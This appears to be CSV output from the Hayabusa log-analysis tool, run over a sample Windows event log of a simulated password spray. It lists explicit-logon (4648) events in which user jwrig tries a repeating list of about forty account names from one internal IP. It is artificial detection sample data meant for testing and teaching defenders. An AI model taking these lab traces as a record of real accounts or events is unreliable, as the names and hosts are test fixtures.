2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:42.669 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:43.731 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:44.801 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:45.880 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:46.969 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:48.042 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:49.108 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:50.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:51.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:52.302 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:53.366 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:54.441 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:55.503 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:56.579 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:57.650 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:58.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:28:59.800 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:00.872 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:01.934 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:02.995 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:04.075 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:05.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:06.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:07.308 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:08.370 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:09.433 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:10.523 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:11.590 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:12.649 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:13.722 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:14.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:15.846 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:16.940 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:18.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:19.076 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:20.162 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:21.257 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:22.327 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:23.410 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:24.477 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:25.557 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:26.628 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:27.690 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:28.763 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:29.837 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:30.921 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:31.996 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:33.058 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:34.138 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:35.199 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:36.266 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:37.375 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:38.439 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:39.499 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
2019-05-01 04:29:40.560 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx
